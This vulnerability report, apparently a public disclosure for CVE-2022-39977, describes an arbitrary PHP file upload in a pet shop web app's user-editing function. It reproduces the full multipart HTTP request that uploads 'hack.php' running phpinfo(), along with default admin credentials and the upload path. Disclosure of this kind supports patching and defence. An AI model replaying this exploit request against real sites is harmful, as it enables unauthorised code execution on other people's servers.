Headline
CVE-2022-39977: bug_report/RCE-2.md at main · z1pwn/bug_report
Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the User module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.
Permalink
Cannot retrieve contributors at this time
Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)
BUG_Author: z1pwn
Admind login account: admin/admin123
vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html
Vulnerability url: http://ip/pet_shop/admin/?page=user —> http://ip/pet_shop/classes/Users.php?f=save
Loophole location:The editing function of the “user” module in the background management system there is an arbitrary file upload vulnerability in the picture upload point.
Request package for file upload:
POST /pet_shop/classes/Users.php?f=save HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.19/pet_shop/admin/?page=user Content-Length: 748 Content-Type: multipart/form-data; boundary=---------------------------192831994119577 Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5 Connection: close -----------------------------192831994119577 Content-Disposition: form-data; name="id" 1 -----------------------------192831994119577 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------192831994119577 Content-Disposition: form-data; name="lastname" Admin -----------------------------192831994119577 Content-Disposition: form-data; name="username" admin -----------------------------192831994119577 Content-Disposition: form-data; name="password" admin123 -----------------------------192831994119577 Content-Disposition: form-data; name="img"; filename="hack.php" Content-Type: application/octet-stream JFJF <?php phpinfo();?> -----------------------------192831994119577–
The files will be uploaded to this directory \pet_shop\uploads
We visited the directory of the file in the browser and found that the code had been executed